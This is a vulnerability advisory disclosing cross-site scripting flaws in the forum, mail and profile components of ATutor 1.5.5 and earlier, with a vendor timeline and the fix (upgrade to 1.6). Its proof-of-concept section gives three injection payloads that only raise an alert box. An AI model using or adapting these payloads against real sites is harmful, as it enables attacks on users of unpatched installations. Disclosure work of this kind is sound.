====================================================================== ATutor <= 1.5.5 Cross Site Scripting ====================================================================== Author: L4teral <l4teral [4t] gmail com> Impact: Cross Site Scripting Status: patch available ------------------------------ Affected software description: ------------------------------ Application: ATutor Version: <= 1.5.5 Vendor: http://www.atutor.ca Description: ATutor is an Open Source Web-based Learning Content Management System (LCMS) designed with accessibility and adaptability in mind. Administrators can install or update ATutor in minutes, develop custom templates to give ATutor a new look, and easily extend its functionality with feature modules. Educators can quickly assemble, package, and redistribute Web-based instructional content, easily retrieve and import prepackaged content, and conduct their courses online. Students learn in an adaptive learning environment. -------------- Vulnerability: -------------- The mail and forum components are vulnerable to cross site scripting. Script code can be embedded into the user profile. ------------ PoC/Exploit: ------------ create forum post/mail with: http://www.ex"style="width:expression(alert('xss'))"ample.com (IE only) create forum post/mail with: http://www.ex"onmouseover="javascript:alert('xss');"ample.com use the following as website in the profile: http://"></a><script>alert('xss')</script> --------- Solution: --------- update to version 1.6 or above. --------- Timeline: --------- 2007-10-17 - vendor informed 2007-10-18 - vendor responded 2008-02-05 - vendor released new version 2008-02-17 - public disclosure